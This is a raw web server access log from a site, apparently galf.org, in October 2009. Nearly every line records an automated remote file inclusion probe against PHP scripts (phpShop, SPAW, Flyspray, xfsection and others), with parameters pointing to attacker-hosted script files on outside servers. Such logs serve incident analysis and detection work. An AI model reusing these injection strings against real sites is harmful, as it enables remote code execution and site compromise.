91.121.3.184 - - [25/Oct/2009:22:34:44 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
61.206.45.161 - - [25/Oct/2009:22:35:52 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.206.45.161 - - [25/Oct/2009:22:35:52 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
61.206.45.161 - - [25/Oct/2009:22:35:53 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:37:32 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:37:34 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:37:36 -0700] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.206.45.161 - - [25/Oct/2009:22:38:20 -0700] "GET /logs/access_091012.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.206.45.161 - - [25/Oct/2009:22:38:21 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.206.45.161 - - [25/Oct/2009:22:38:21 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:39:11 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.143.3.188 - - [25/Oct/2009:22:39:14 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:39:14 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:39:14 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:39:14 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:39:15 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:39:16 -0700] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [25/Oct/2009:22:39:35 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:39:36 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:39:46 -0700] "GET /logs/access_090803.log/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:41:25 -0700] "GET /logs/access_091012.log/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:41:25 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:41:25 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:41:55 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:41:57 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:41:58 -0700] "GET /logs/access.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
200.108.199.16 - - [25/Oct/2009:22:42:37 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
86.65.110.157 - - [25/Oct/2009:22:43:06 -0700] "GET /logs/access.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
86.65.110.157 - - [25/Oct/2009:22:43:06 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
86.65.110.157 - - [25/Oct/2009:22:43:07 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
200.108.199.16 - - [25/Oct/2009:22:43:17 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:43:29 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:43:35 -0700] "GET /logs/access_091005.log/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:43:41 -0700] "GET /logs/access_090928.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:43:41 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [25/Oct/2009:22:44:51 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
86.65.110.157 - - [25/Oct/2009:22:44:52 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
86.65.110.157 - - [25/Oct/2009:22:44:52 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
72.11.145.8 - - [25/Oct/2009:22:45:23 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:45:23 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:45:30 -0700] "GET /logs/access_091012.log/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:45:52 -0700] "GET /logs/access_090803.log/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:45:52 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:45:52 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
86.65.110.157 - - [25/Oct/2009:22:48:16 -0700] "GET /logs/access_091012.log//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
86.65.110.157 - - [25/Oct/2009:22:48:17 -0700] "GET /modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
86.65.110.157 - - [25/Oct/2009:22:48:17 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:48:34 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:48:34 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:48:34 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:48:34 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:49:00 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:49:00 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:49:09 -0700] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
78.143.47.76 - - [25/Oct/2009:22:49:09 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:49:10 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
78.143.47.76 - - [25/Oct/2009:22:49:11 -0700] "GET /logs/access_090316.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.museum-mputantular.com//AhoK/ip.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:22:49:23 -0700] "GET /logs/access_091005.log/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:22:49:38 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [25/Oct/2009:22:49:38 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [25/Oct/2009:22:49:41 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
98.129.217.53 - - [25/Oct/2009:22:57:08 -0700] "GET /logs/access_090720.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [25/Oct/2009:22:57:08 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [25/Oct/2009:22:57:08 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.170 - - [25/Oct/2009:22:57:10 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.170 - - [25/Oct/2009:22:57:10 -0700] "GET /logs/access_090720.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.170 - - [25/Oct/2009:22:57:10 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [25/Oct/2009:22:57:22 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [25/Oct/2009:22:57:22 -0700] "GET /logs/access_090720.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [25/Oct/2009:22:57:22 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:58:50 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:58:50 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:58:50 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:22:58:50 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
216.7.173.20 - - [25/Oct/2009:23:01:24 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Oct/2009:23:01:24 -0700] "GET /logs/access_090720.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.7.173.20 - - [25/Oct/2009:23:01:26 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [25/Oct/2009:23:01:48 -0700] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
98.129.217.53 - - [25/Oct/2009:23:01:49 -0700] "GET /logs/access_090810.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [25/Oct/2009:23:01:57 -0700] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [25/Oct/2009:23:02:03 -0700] "GET /logs/access_090810.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.170 - - [25/Oct/2009:23:02:17 -0700] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.170 - - [25/Oct/2009:23:02:17 -0700] "GET /logs/access_090810.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Oct/2009:23:03:02 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [25/Oct/2009:23:03:02 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [25/Oct/2009:23:03:02 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://home.megapass.co.kr/~leekimuk/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.15.88.55 - - [25/Oct/2009:23:03:58 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.15.88.55 - - [25/Oct/2009:23:03:59 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.15.88.55 - - [25/Oct/2009:23:04:11 -0700] "GET /logs/access_090720.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [25/Oct/2009:23:04:19 -0700] "GET /logs/access.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [25/Oct/2009:23:04:19 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
72.11.145.8 - - [25/Oct/2009:23:04:22 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.metallobase.ru/.../id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:04:27 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:04:27 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:04:27 -0700] "GET /logs/access_090420.log//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:04:28 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:04:28 -0700] "GET /logs/access_090420.log//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:04:28 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.122 - - [25/Oct/2009:23:04:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.122 - - [25/Oct/2009:23:06:02 -0700] "GET /?M=D HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:07 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:07 -0700] "GET /logs/access_091012.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:07 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:08 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:08 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:08 -0700] "GET /logs/access_091012.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:12 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:12 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:12 -0700] "GET /logs/access_091012.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:14 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:14 -0700] "GET /logs/access_091012.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:14 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:15 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:15 -0700] "GET /logs/access_091012.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:15 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:52 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:52 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:52 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:55 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:55 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
